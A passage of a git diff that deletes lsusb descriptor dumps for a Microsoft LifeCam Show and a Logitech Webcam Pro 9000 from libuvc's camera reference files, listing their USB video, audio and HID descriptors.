-  bcdUSB               2.00
-  bDeviceClass          239 Miscellaneous Device
-  bDeviceSubClass         2 ?
-  bDeviceProtocol         1 Interface Association
-  bMaxPacketSize0        64
-  idVendor           0x045e Microsoft Corp.
-  idProduct          0x0729 
-  bcdDevice            1.00
-  iManufacturer           1 Microsoft
-  iProduct                2 Microsoft® LifeCam Show(TM)
-  iSerial                 0 
-  bNumConfigurations      1
-  Configuration Descriptor:
-    bLength                 9
-    bDescriptorType         2
-    wTotalLength          961
-    bNumInterfaces          5
-    bConfigurationValue     1
-    iConfiguration          0 
-    bmAttributes         0x80
-      (Bus Powered)
-    MaxPower              320mA
-    Interface Association:
-      bLength                 8
-      bDescriptorType        11
-      bFirstInterface         0
-      bInterfaceCount         2
-      bFunctionClass         14 Video
-      bFunctionSubClass       3 Video Interface Collection
-      bFunctionProtocol       0 
-      iFunction               2 Microsoft® LifeCam Show(TM)
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        0
-      bAlternateSetting       0
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      1 Video Control
-      bInterfaceProtocol      0 
-      iInterface              2 Microsoft® LifeCam Show(TM)
-      VideoControl Interface Descriptor:
-        bLength                13
-        bDescriptorType        36
-        bDescriptorSubtype      1 (HEADER)
-        bcdUVC               1.00
-        wTotalLength           79
-        dwClockFrequency       24.000000MHz
-        bInCollection           1
-        baInterfaceNr( 0)       1
-      VideoControl Interface Descriptor:
-        bLength                18
-        bDescriptorType        36
-        bDescriptorSubtype      2 (INPUT_TERMINAL)
-        bTerminalID             1
-        wTerminalType      0x0201 Camera Sensor
-        bAssocTerminal          0
-        iTerminal               0 
-        wObjectiveFocalLengthMin      0
-        wObjectiveFocalLengthMax      0
-        wOcularFocalLength            0
-        bControlSize                  3
-        bmControls           0x00000a0a
-          Auto-Exposure Mode
-          Exposure Time (Absolute)
-          Zoom (Absolute)
-          PanTilt (Absolute)
-      VideoControl Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      5 (PROCESSING_UNIT)
-      Warning: Descriptor too short
-        bUnitID                 2
-        bSourceID               1
-        wMaxMultiplier          0
-        bControlSize            2
-        bmControls     0x0000073b
-          Brightness
-          Contrast
-          Saturation
-          Sharpness
-          Gamma
-          Backlight Compensation
-          Gain
-          Power Line Frequency
-        iProcessing             0 
-        bmVideoStandards     0x 9
-          None
-          SECAM - 625/50
-      VideoControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      3 (OUTPUT_TERMINAL)
-        bTerminalID             3
-        wTerminalType      0x0101 USB Streaming
-        bAssocTerminal          0
-        bSourceID               2
-        iTerminal               0 
-      VideoControl Interface Descriptor:
-        bLength                28
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                 4
-        guidExtensionCode         {5dc717a9-1941-da11-ae0e-000d56ac7b4c}
-        bNumControl             8
-        bNrPins                 1
-        baSourceID( 0)          1
-        bControlSize            3
-        bmControls( 0)       0xf9
-        bmControls( 1)       0x01
-        bmControls( 2)       0xc0
-        iExtension              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            3
-          Transfer Type            Interrupt
-          Synch Type               None
-          Usage Type               Data
-        wMaxPacketSize     0x000a  1x 10 bytes
-        bInterval               5
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      VideoStreaming Interface Descriptor:
-        bLength                            15
-        bDescriptorType                    36
-        bDescriptorSubtype                  1 (INPUT_HEADER)
-        bNumFormats                         2
-        wTotalLength                      587
-        bEndPointAddress                  130
-        bmInfo                              0
-        bTerminalLink                       3
-        bStillCaptureMethod                 2
-        bTriggerSupport                     1
-        bTriggerUsage                       1
-        bControlSize                        1
-        bmaControls( 0)                    27
-        bmaControls( 1)                    27
-      VideoStreaming Interface Descriptor:
-        bLength                            27
-        bDescriptorType                    36
-        bDescriptorSubtype                  4 (FORMAT_UNCOMPRESSED)
-        bFormatIndex                        1
-        bNumFrameDescriptors                6
-        guidFormat                            {59555932-0000-1000-8000-00aa00389b71}
-        bBitsPerPixel                      16
-        bDefaultFrameIndex                  1
-        bAspectRatioX                       0
-        bAspectRatioY                       0
-        bmInterlaceFlags                 0x00
-          Interlaced stream or variable: No
-          Fields per frame: 1 fields
-          Field 1 first: No
-          Field pattern: Field 1 only
-          bCopyProtect                      0
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         1
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            352
-        wHeight                           288
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         2
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           480
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         3
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           240
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         4
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            176
-        wHeight                           144
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         5
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            160
-        wHeight                           120
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         6
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           600
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  3 (STILL_IMAGE_FRAME)
-        bEndpointAddress                    0
-        bNumImageSizePatterns               6
-        wWidth( 0)                        352
-        wHeight( 0)                       288
-        wWidth( 1)                        640
-        wHeight( 1)                       480
-        wWidth( 2)                        320
-        wHeight( 2)                       240
-        wWidth( 3)                        176
-        wHeight( 3)                       144
-        wWidth( 4)                        160
-        wHeight( 4)                       120
-        wWidth( 5)                        800
-        wHeight( 5)                       600
-        bNumCompressionPatterns             6
-      VideoStreaming Interface Descriptor:
-        bLength                             6
-        bDescriptorType                    36
-        bDescriptorSubtype                 13 (COLORFORMAT)
-        bColorPrimaries                     0 (Unspecified)
-        bTransferCharacteristics            0 (Unspecified)
-        bMatrixCoefficients                 0 (Unspecified)
-      VideoStreaming Interface Descriptor:
-        bLength                            11
-        bDescriptorType                    36
-        bDescriptorSubtype                  6 (FORMAT_MJPEG)
-        bFormatIndex                        2
-        bNumFrameDescriptors                9
-        bFlags                              1
-          Fixed-size samples: Yes
-        bDefaultFrameIndex                  1
-        bAspectRatioX                       0
-        bAspectRatioY                       0
-        bmInterlaceFlags                 0x00
-          Interlaced stream or variable: No
-          Fields per frame: 1 fields
-          Field 1 first: No
-          Field pattern: Field 1 only
-          bCopyProtect                      0
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         1
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            352
-        wHeight                           288
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         2
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           480
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         3
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           240
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         4
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            176
-        wHeight                           144
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         5
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            160
-        wHeight                           120
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         6
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           600
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         7
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1024
-        wHeight                           768
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval        1333333
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)           1333333
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         8
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1280
-        wHeight                           960
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval        1333333
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)           1333333
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         9
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1600
-        wHeight                          1200
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval        1333333
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)           1333333
-      VideoStreaming Interface Descriptor:
-        bLength                            42
-        bDescriptorType                    36
-        bDescriptorSubtype                  3 (STILL_IMAGE_FRAME)
-        bEndpointAddress                    0
-        bNumImageSizePatterns               9
-        wWidth( 0)                        352
-        wHeight( 0)                       288
-        wWidth( 1)                        640
-        wHeight( 1)                       480
-        wWidth( 2)                        320
-        wHeight( 2)                       240
-        wWidth( 3)                        176
-        wHeight( 3)                       144
-        wWidth( 4)                        160
-        wHeight( 4)                       120
-        wWidth( 5)                        800
-        wHeight( 5)                       600
-        wWidth( 6)                       1024
-        wHeight( 6)                       768
-        wWidth( 7)                       1280
-        wHeight( 7)                       960
-        wWidth( 8)                       1600
-        wHeight( 8)                      1200
-        bNumCompressionPatterns             9
-      VideoStreaming Interface Descriptor:
-        bLength                             6
-        bDescriptorType                    36
-        bDescriptorSubtype                 13 (COLORFORMAT)
-        bColorPrimaries                     0 (Unspecified)
-        bTransferCharacteristics            0 (Unspecified)
-        bMatrixCoefficients                 0 (Unspecified)
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       1
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0080  1x 128 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       2
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0200  1x 512 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       3
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0400  1x 1024 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       4
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0b00  2x 768 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       5
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0c00  2x 1024 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       6
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x1380  3x 896 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       7
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x1400  3x 1024 bytes
-        bInterval               1
-    Interface Association:
-      bLength                 8
-      bDescriptorType        11
-      bFirstInterface         2
-      bInterfaceCount         2
-      bFunctionClass          1 Audio
-      bFunctionSubClass       2 Streaming
-      bFunctionProtocol       0 
-      iFunction               2 Microsoft® LifeCam Show(TM)
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        2
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      1 Control Device
-      bInterfaceProtocol      0 
-      iInterface              2 Microsoft® LifeCam Show(TM)
-      AudioControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      1 (HEADER)
-        bcdADC               1.00
-        wTotalLength           39
-        bInCollection           1
-        baInterfaceNr( 0)       3
-      AudioControl Interface Descriptor:
-        bLength                12
-        bDescriptorType        36
-        bDescriptorSubtype      2 (INPUT_TERMINAL)
-        bTerminalID             1
-        wTerminalType      0x0201 Microphone
-        bAssocTerminal          0
-        bNrChannels             1
-        wChannelConfig     0x0000
-        iChannelNames           0 
-        iTerminal               0 
-      AudioControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      6 (FEATURE_UNIT)
-        bUnitID                 2
-        bSourceID               1
-        bControlSize            1
-        bmaControls( 0)      0x00
-        bmaControls( 1)      0x03
-          Mute
-          Volume
-        iFeature                0 
-      AudioControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      3 (OUTPUT_TERMINAL)
-        bTerminalID             3
-        wTerminalType      0x0101 USB Streaming
-        bAssocTerminal          1
-        bSourceID               2
-        iTerminal               0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       1
-      bNumEndpoints           1
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      AudioStreaming Interface Descriptor:
-        bLength                 7
-        bDescriptorType        36
-        bDescriptorSubtype      1 (AS_GENERAL)
-        bTerminalLink           3
-        bDelay                  1 frames
-        wFormatTag              1 PCM
-      AudioStreaming Interface Descriptor:
-        bLength                14
-        bDescriptorType        36
-        bDescriptorSubtype      2 (FORMAT_TYPE)
-        bFormatType             1 (FORMAT_TYPE_I)
-        bNrChannels             1
-        bSubframeSize           2
-        bBitResolution         16
-        bSamFreqType            2 Discrete
-        tSamFreq[ 0]        44100
-        tSamFreq[ 1]        48000
-      Endpoint Descriptor:
-        bLength                 9
-        bDescriptorType         5
-        bEndpointAddress     0x83  EP 3 IN
-        bmAttributes            1
-          Transfer Type            Isochronous
-          Synch Type               None
-          Usage Type               Data
-        wMaxPacketSize     0x0062  1x 98 bytes
-        bInterval               4
-        bRefresh                0
-        bSynchAddress           0
-        AudioControl Endpoint Descriptor:
-          bLength                 7
-          bDescriptorType        37
-          bDescriptorSubtype      1 (EP_GENERAL)
-          bmAttributes         0x01
-            Sampling Frequency
-          bLockDelayUnits         0 Undefined
-          wLockDelay              0 Undefined
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        4
-      bAlternateSetting       0
-      bNumEndpoints           1
-      bInterfaceClass         3 Human Interface Device
-      bInterfaceSubClass      1 Boot Interface Subclass
-      bInterfaceProtocol      1 Keyboard
-      iInterface              0 
-        HID Device Descriptor:
-          bLength                 9
-          bDescriptorType        33
-          bcdHID               1.10
-          bCountryCode            0 Not supported
-          bNumDescriptors         1
-          bDescriptorType        34 Report
-          wDescriptorLength      24
-         Report Descriptors: 
-           ** UNAVAILABLE **
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x85  EP 5 IN
-        bmAttributes            3
-          Transfer Type            Interrupt
-          Synch Type               None
-          Usage Type               Data
-        wMaxPacketSize     0x0001  1x 1 bytes
-        bInterval              10
-Device Qualifier (for other device speed):
-  bLength                10
-  bDescriptorType         6
-  bcdUSB               2.00
-  bDeviceClass          239 Miscellaneous Device
-  bDeviceSubClass         2 ?
-  bDeviceProtocol         1 Interface Association
-  bMaxPacketSize0        64
-  bNumConfigurations      1
-Device Status:     0x0000
-  (Bus Powered)
diff --git a/thirdparty/libuvc-0.0.6/cameras/quickcampro9000.txt b/thirdparty/libuvc-0.0.6/cameras/quickcampro9000.txt
deleted file mode 100644
index 5b859b3..0000000
--- a/thirdparty/libuvc-0.0.6/cameras/quickcampro9000.txt
+++ /dev/null
@@ -1,1543 +0,0 @@
-
-Bus 001 Device 009: ID 046d:0809 Logitech, Inc. Webcam Pro 9000
-Device Descriptor:
-  bLength                18
-  bDescriptorType         1
-  bcdUSB               2.00
-  bDeviceClass          239 Miscellaneous Device
-  bDeviceSubClass         2 ?
-  bDeviceProtocol         1 Interface Association
-  bMaxPacketSize0        64
-  idVendor           0x046d Logitech, Inc.
-  idProduct          0x0809 Webcam Pro 9000
-  bcdDevice            0.10
-  iManufacturer           0 
-  iProduct                0 
-  iSerial                 2 XXXXXXXX
-  bNumConfigurations      1
-  Configuration Descriptor:
-    bLength                 9
-    bDescriptorType         2
-    wTotalLength         2589
-    bNumInterfaces          4
-    bConfigurationValue     1
-    iConfiguration          0 
-    bmAttributes         0x80
-      (Bus Powered)
-    MaxPower              500mA
-    Interface Association:
-      bLength                 8
-      bDescriptorType        11
-      bFirstInterface         0
-      bInterfaceCount         2
-      bFunctionClass         14 Video
-      bFunctionSubClass       3 Video Interface Collection
-      bFunctionProtocol       0 
-      iFunction               0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        0
-      bAlternateSetting       0
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      1 Video Control
-      bInterfaceProtocol      0 
-      iInterface              0 
-      VideoControl Interface Descriptor:
-        bLength                13
-        bDescriptorType        36
-        bDescriptorSubtype      1 (HEADER)
-        bcdUVC               1.00
-        wTotalLength          245
-        dwClockFrequency       48.000000MHz
-        bInCollection           1
-        baInterfaceNr( 0)       1
-      VideoControl Interface Descriptor:
-        bLength                18
-        bDescriptorType        36
-        bDescriptorSubtype      2 (INPUT_TERMINAL)
-        bTerminalID             1
-        wTerminalType      0x0201 Camera Sensor
-        bAssocTerminal          0
-        iTerminal               0 
-        wObjectiveFocalLengthMin      0
-        wObjectiveFocalLengthMax      0
-        wOcularFocalLength            0
-        bControlSize                  3
-        bmControls           0x0000080e
-          Auto-Exposure Mode
-          Auto-Exposure Priority
-          Exposure Time (Absolute)
-          PanTilt (Absolute)
-      VideoControl Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      5 (PROCESSING_UNIT)
-      Warning: Descriptor too short
-        bUnitID                 2
-        bSourceID               1
-        wMaxMultiplier      16384
-        bControlSize            2
-        bmControls     0x0000175b
-          Brightness
-          Contrast
-          Saturation
-          Sharpness
-          White Balance Temperature
-          Backlight Compensation
-          Gain
-          Power Line Frequency
-          White Balance Temperature, Auto
-        iProcessing             0 
-        bmVideoStandards     0x1b
-          None
-          NTSC - 525/60
-          SECAM - 625/50
-          NTSC - 625/50
-      VideoControl Interface Descriptor:
-        bLength                27
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                 4
-        guidExtensionCode         {82066163-7050-ab49-b8cc-b3855e8d221e}
-        bNumControl            10
-        bNrPins                 1
-        baSourceID( 0)          2
-        bControlSize            2
-        bmControls( 0)       0xff
-        bmControls( 1)       0x03
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                27
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                13
-        guidExtensionCode         {82066163-7050-ab49-b8cc-b3855e8d221f}
-        bNumControl             7
-        bNrPins                 1
-        baSourceID( 0)          2
-        bControlSize            2
-        bmControls( 0)       0x6f
-        bmControls( 1)       0x01
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                28
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                 8
-        guidExtensionCode         {82066163-7050-ab49-b8cc-b3855e8d2251}
-        bNumControl             3
-        bNrPins                 1
-        baSourceID( 0)          4
-        bControlSize            3
-        bmControls( 0)       0x19
-        bmControls( 1)       0x00
-        bmControls( 2)       0x00
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                28
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                10
-        guidExtensionCode         {82066163-7050-ab49-b8cc-b3855e8d2252}
-        bNumControl            24
-        bNrPins                 1
-        baSourceID( 0)          4
-        bControlSize            3
-        bmControls( 0)       0xff
-        bmControls( 1)       0xff
-        bmControls( 2)       0xff
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                28
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                14
-        guidExtensionCode         {b7935ba4-15c7-0245-90f4-532a3b311365}
-        bNumControl             4
-        bNrPins                 1
-        baSourceID( 0)          1
-        bControlSize            3
-        bmControls( 0)       0x0f
-        bmControls( 1)       0x00
-        bmControls( 2)       0x00
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                28
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                 9
-        guidExtensionCode         {82066163-7050-ab49-b8cc-b3855e8d2256}
-        bNumControl             5
-        bNrPins                 1
-        baSourceID( 0)          4
-        bControlSize            3
-        bmControls( 0)       0x0c
-        bmControls( 1)       0x00
-        bmControls( 2)       0x00
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                28
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                12
-        guidExtensionCode         {82066163-7050-ab49-b8cc-b3855e8d2250}
-        bNumControl            17
-        bNrPins                 1
-        baSourceID( 0)          4
-        bControlSize            3
-        bmControls( 0)       0xfe
-        bmControls( 1)       0x7f
-        bmControls( 2)       0x70
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      3 (OUTPUT_TERMINAL)
-        bTerminalID             5
-        wTerminalType      0x0101 USB Streaming
-        bAssocTerminal          0
-        bSourceID               4
-        iTerminal               0 
-      ** UNRECOGNIZED:  20 41 01 0b 82 06 61 63 70 50 ab 49 b8 cc b3 85 5e 8d 22 55 01 01 04 03 01 00 00 00 00 00 00 00
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x87  EP 7 IN
-        bmAttributes            3
-          Transfer Type            Interrupt
-          Synch Type               None
-          Usage Type               Data
-        wMaxPacketSize     0x0010  1x 16 bytes
-        bInterval               8
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      VideoStreaming Interface Descriptor:
-        bLength                            16
-        bDescriptorType                    36
-        bDescriptorSubtype                  1 (INPUT_HEADER)
-        bNumFormats                         3
-        wTotalLength                     1852
-        bEndPointAddress                  129
-        bmInfo                              0
-        bTerminalLink                       5
-        bStillCaptureMethod                 2
-        bTriggerSupport                     1
-        bTriggerUsage                       0
-        bControlSize                        1
-        bmaControls( 0)                    27
